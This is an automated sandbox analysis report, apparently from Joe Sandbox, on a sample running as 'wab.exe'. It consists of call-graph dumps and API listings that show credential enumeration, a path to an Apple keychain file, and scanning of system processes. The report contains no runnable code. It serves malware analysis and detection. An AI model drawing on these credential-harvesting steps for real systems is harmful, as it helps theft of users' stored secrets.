4375bc 40303 415c7d 16 API calls 40301->40303 40304 4375d2 40303->40304 40306 4442e6 11 API calls 40304->40306 40326 4373a7 40304->40326 40305->40299 40307 4375e2 40306->40307 40307->40326 40383 444283 13 API calls 40307->40383 40309->40299 40381 42453e 123 API calls 40312->40381 40315 4375f4 40318 437620 40315->40318 40319 43760b 40315->40319 40317 43759f 40320 416935 16 API calls 40317->40320 40322 416935 16 API calls 40318->40322 40384 444283 13 API calls 40319->40384 40320->40324 40322->40326 40324->40301 40382 42453e 123 API calls 40324->40382 40325 437612 memcpy 40325->40326 40326->40260 40327->40299 40328->40244 40329->40264 40330->40261 40331->40264 40332->40244 40333->40269 40334->40279 40335->40275 40336->40269 40337->40269 40339 41bc3b 101 API calls 40338->40339 40340 41f1b4 40339->40340 40341 41edad 86 API calls 40340->40341 40348 41f282 40340->40348 40342 41f1cb 40341->40342 40343 41f1f5 memcmp 40342->40343 40344 41f20e 40342->40344 40342->40348 40343->40344 40345 41f21b memcmp 40344->40345 40344->40348 40346 41f326 40345->40346 40349 41f23d 40345->40349 40347 41ee6b 86 API calls 40346->40347 40346->40348 40347->40348 40348->40288 40349->40346 40350 41f28e memcmp 40349->40350 40352 41c8df 56 API calls 40349->40352 40350->40346 40351 41f2a9 40350->40351 40351->40346 40354 41f308 40351->40354 40355 41f2d8 40351->40355 40353 41f269 40352->40353 40353->40346 40356 41f287 40353->40356 40357 41f27a 40353->40357 40354->40346 40361 4446ce 11 API calls 40354->40361 40358 41ee6b 86 API calls 40355->40358 40356->40350 40359 41ee6b 86 API calls 40357->40359 40360 41f2e0 40358->40360 40359->40348 40362 41b1ca memset 40360->40362 40361->40346 40362->40348 40363->40288 40364->40288 40365->40288 40366->40282 40367->40283 40369 417044 40368->40369 40370 41705c 40368->40370 40372 416760 11 API calls 40369->40372 40374 417055 40369->40374 40371 417075 40370->40371 40373 41707a 11 API calls 40370->40373 40371->40294 40372->40374 40373->40369 40374->40294 40375->40326 40376->40299 40377->40299 40378->40299 40379->40299 40380->40299 40381->40317 40382->40301 40383->40315 40384->40325 40390 415cfe 40385->40390 40395 415d23 __aullrem __aulldvrm 40390->40395 40397 41628e 40390->40397 40391 4163ca 40404 416422 11 API calls 40391->40404 40393 416422 10 API calls 40393->40395 40394 416172 memset 40394->40395 40395->40391 40395->40393 40395->40394 40396 415cb9 10 API calls 40395->40396 40395->40397 40396->40395 40398 416520 40397->40398 40399 416527 40398->40399 40403 416574 40398->40403 40401 416544 40399->40401 40399->40403 40405 4156aa 11 API calls 40399->40405 40402 416561 memcpy 40401->40402 40401->40403 40402->40403 40403->40197 40404->40397 40405->40401 40437 41493c EnumResourceNamesW 37678 4287c1 37679 4287d2 37678->37679 37680 429ac1 37678->37680 37681 428818 37679->37681 37682 42881f 37679->37682 37688 425711 37679->37688 37693 425ad6 37680->37693 37748 415c56 11 API calls 37680->37748 37715 42013a 37681->37715 37743 420244 97 API calls 37682->37743 37687 4260dd 37742 424251 120 API calls 37687->37742 37688->37680 37690 4259da 37688->37690 37696 422aeb memset memcpy memcpy 37688->37696 37697 429a4d 37688->37697 37700 4260a1 37688->37700 37711 4259c2 37688->37711 37714 425a38 37688->37714 37731 4227f0 memset memcpy 37688->37731 37732 422b84 15 API calls 37688->37732 37733 422b5d memset memcpy memcpy 37688->37733 37734 422640 13 API calls 37688->37734 37736 4241fc 11 API calls 37688->37736 37737 42413a 90 API calls 37688->37737 37741 416760 11 API calls 37690->37741 37696->37688 37698 429a66 37697->37698 37702 429a9b 37697->37702 37744 415c56 11 API calls 37698->37744 37740 415c56 11 API calls 37700->37740 37703 429a96 37702->37703 37746 416760 11 API calls 37702->37746 37747 424251 120 API calls 37703->37747 37706 429a7a 37745 416760 11 API calls 37706->37745 37711->37693 37735 415c56 11 API calls 37711->37735 37714->37711 37738 422640 13 API calls 37714->37738 37739 4226e0 12 API calls 37714->37739 37716 42014c 37715->37716 37719 420151 37715->37719 37758 41e466 97 API calls 37716->37758 37718 420162 37718->37688 37719->37718 37720 4201b3 37719->37720 37721 420229 37719->37721 37722 4201b8 37720->37722 37723 4201dc 37720->37723 37721->37718 37724 41fd5e 86 API calls 37721->37724 37749 41fbdb 37722->37749 37723->37718 37727 4201ff 37723->37727 37755 41fc4c 37723->37755 37724->37718 37727->37718 37730 42013a 97 API calls 37727->37730 37730->37718 37731->37688 37732->37688 37733->37688 37734->37688 37735->37690 37736->37688 37737->37688 37738->37714 37739->37714 37740->37690 37741->37687 37742->37693 37743->37688 37744->37706 37745->37703 37746->37703 37747->37680 37748->37690 37750 41fbf1 37749->37750 37751 41fbf8 37749->37751 37754 41fc39 37750->37754 37773 4446ce 11 API calls 37750->37773 37763 41ee26 37751->37763 37754->37718 37759 41fd5e 37754->37759 37756 41ee6b 86 API calls 37755->37756 37757 41fc5d 37756->37757 37757->37723 37758->37719 37761 41fd65 37759->37761 37760 41fdab 37760->37718 37761->37760 37762 41fbdb 86 API calls 37761->37762 37762->37761 37764 41ee41 37763->37764 37765 41ee32 37763->37765 37774 41edad 37764->37774 37777 4446ce 11 API calls 37765->37777 37768 41ee3c 37768->37750 37771 41ee58 37771->37768 37779 41ee6b 37771->37779 37773->37754 37783 41be52 37774->37783 37777->37768 37778 41eb85 11 API calls 37778->37771 37780 41ee70 37779->37780 37781 41ee78 37779->37781 37839 41bf99 86 API calls 37780->37839 37781->37768 37784 41be6f 37783->37784 37785 41be5f 37783->37785 37791 41be8c 37784->37791 37804 418c63 37784->37804 37818 4446ce 11 API calls 37785->37818 37788 41be69 37788->37768 37788->37778 37789 41bee7 37789->37788 37822 41a453 86 API calls 37789->37822 37791->37788 37791->37789 37792 41bf3a 37791->37792 37795 41bed1 37791->37795 37821 4446ce 11 API calls 37792->37821 37794 41bef0 37794->37789 37797 41bf01 37794->37797 37795->37794 37798 41bee2 37795->37798 37796 41bf24 memset 37796->37788 37797->37796 37799 41bf14 37797->37799 37819 418a6d memset memcpy memset 37797->37819 37808 41ac13 37798->37808 37820 41a223 memset memcpy memset 37799->37820 37803 41bf20 37803->37796 37807 418c72 37804->37807 37805 418c94 37805->37791 37806 418d51 memset memset 37806->37805 37807->37805 37807->37806 37809 41ac52 37808->37809 37810 41ac3f memset 37808->37810 37813 41ac6a 37809->37813 37823 41dc14 19 API calls 37809->37823 37811 41acd9 37810->37811 37811->37789 37815 41aca1 37813->37815 37824 41519d 37813->37824 37815->37811 37816 41acc0 memset 37815->37816 37817 41accd memcpy 37815->37817 37816->37811 37817->37811 37818->37788 37819->37799 37820->37803 37821->37789 37823->37813 37827 4175ed 37824->37827 37835 417570 SetFilePointer 37827->37835 37830 41760a ReadFile 37831 417637 37830->37831 37832 417627 GetLastError 37830->37832 37833 4151b3 37831->37833 37834 41763e memset 37831->37834 37832->37833 37833->37815 37834->37833 37836 4175b2 37835->37836 37837 41759c GetLastError 37835->37837 37836->37830 37836->37833 37837->37836 37838 4175a8 GetLastError 37837->37838 37838->37836 37839->37781 37840 417bc5 37842 417c61 37840->37842 37846 417bda 37840->37846 37841 417bf6 UnmapViewOfFile CloseHandle 37841->37841 37841->37846 37844 417c2c 37844->37846 37852 41851e 20 API calls 37844->37852 37846->37841 37846->37842 37846->37844 37847 4175b7 37846->37847 37848 4175d6 FindCloseChangeNotification 37847->37848 37849 4175c8 37848->37849 37850 4175df 37848->37850 37849->37850 37851 4175ce Sleep 37849->37851 37850->37846 37851->37848 37852->37844 39886 4147f3 39889 414561 39886->39889 39888 414813 39890 41456d 39889->39890 39891 41457f GetPrivateProfileIntW 39889->39891 39894 4143f1 memset _itow WritePrivateProfileStringW 39890->39894 39891->39888 39893 41457a 39893->39888 39894->39893

                  Executed Functions

                  Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 360 40de6e-40de71 359->360 360->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 377 40dffd-40e006 372->377 373->363 373->377 375 40df08 374->375 376 40dfef-40dff2 CloseHandle 374->376 378 40df0b-40df10 375->378 376->373 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->376 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                  APIs
                  • memset.MSVCRT ref: 0040DDAD
                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                  • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                  • _wcsicmp.MSVCRT ref: 0040DEB2
                  • _wcsicmp.MSVCRT ref: 0040DEC5
                  • _wcsicmp.MSVCRT ref: 0040DED8
                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                  • memset.MSVCRT ref: 0040DF5F
                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                  • _wcsicmp.MSVCRT ref: 0040DFB2
                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                  • API String ID: 594330280-3398334509
                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                  Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 FindCloseChangeNotification 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 ??3@YAXPAX@Z 643->646 648 413edb-413ee2 645->648 646->648 652 413ee4 648->652 653 413ee7-413efe 648->653 662 413ea2-413eae CloseHandle 650->662 656 413e61-413e68 651->656 657 413e37-413e44 GetModuleHandleW 651->657 652->653 653->638 656->650 659 413e6a-413e76 656->659 657->656 658 413e46-413e5c GetProcAddress 657->658 658->656 659->650 662->641
                  APIs
                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                  • memset.MSVCRT ref: 00413D7F
                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                  • memset.MSVCRT ref: 00413E07
                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                  • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,0000022C), ref: 00413F1A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@CloseHandleProcess32memset$AddressChangeCreateFindFirstModuleNextNotificationOpenProcProcessSnapshotToolhelp32
                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                  • API String ID: 2191996607-1740548384
                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                  Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                  • memcpy.MSVCRT ref: 0040B60D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                  • String ID: BIN
                  • API String ID: 1668488027-1015027815
                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                  Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                    • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                  • String ID:
                  • API String ID: 2947809556-0
                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                  Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileFind$FirstNext
                  • String ID:
                  • API String ID: 1690352074-0
                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                  Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0041898C
                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: InfoSystemmemset
                  • String ID:
                  • API String ID: 3558857096-0
                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                  Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 39 44558e-445594 call 444b06 4->39 40 44557e-44558c call 4136c0 call 41366b 4->40 16 4455e5 5->16 17 4455e8-4455f9 5->17 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 19 445861-445874 call 40a889 call 403c9c 13->19 20 4458ac-4458b5 13->20 42 445823-445826 14->42 16->17 24 445672-445683 call 40a889 call 403fbe 17->24 25 4455fb-445601 17->25 50 445879-44587c 19->50 26 44594f-445958 20->26 27 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 20->27 84 445685 24->84 85 4456b2-4456b5 call 40b1ab 24->85 28 445605-445607 25->28 29 445603 25->29 35 4459f2-4459fa 26->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 26->36 135 44592d-445945 call 40b6ef 27->135 136 44594a 27->136 28->24 38 445609-44560d 28->38 29->28 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->24 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 39->3 40->39 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 50->64 65 44587e 50->65 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 73 445fae-445fb2 60->73 74 445d2b-445d3b 60->74 168 445cf5 61->168 169 445cfc-445d03 61->169 64->20 82 445884-44589d call 40a9b5 call 4087b3 65->82 138 445849 66->138 247 445c77 67->247 68->67 83 445ba2-445bcf call 4099c6 call 445403 call 445389 68->83 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->90 156 44589f 82->156 83->53 99 44568b-4456a4 call 40a9b5 call 4087b3 84->99 116 4456ba-4456c4 85->116 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 117 4457f9 116->117 118 4456ca-4456d3 call 413cfa call 413d4c 116->118 117->6 172 4456d8-4456f7 call 40b2cc call 413fa6 118->172 135->136 136->26 138->51 150->116 151->150 153->154 154->35 156->64 158->85 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->73 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                  APIs
                  • memset.MSVCRT ref: 004455C2
                  • wcsrchr.MSVCRT ref: 004455DA
                  • memset.MSVCRT ref: 0044570D
                  • memset.MSVCRT ref: 00445725
                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                    • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                    • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                    • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                  • memset.MSVCRT ref: 0044573D
                  • memset.MSVCRT ref: 00445755
                  • memset.MSVCRT ref: 004458CB
                  • memset.MSVCRT ref: 004458E3
                  • memset.MSVCRT ref: 0044596E
                  • memset.MSVCRT ref: 00445A10
                  • memset.MSVCRT ref: 00445A28
                  • memset.MSVCRT ref: 00445AC6
                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                  • memset.MSVCRT ref: 00445B52
                  • memset.MSVCRT ref: 00445B6A
                  • memset.MSVCRT ref: 00445C9B
                  • memset.MSVCRT ref: 00445CB3
                  • _wcsicmp.MSVCRT ref: 00445D56
                  • memset.MSVCRT ref: 00445B82
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                  • memset.MSVCRT ref: 00445986
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                  • API String ID: 2745753283-3798722523
                  • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                  • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                  Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
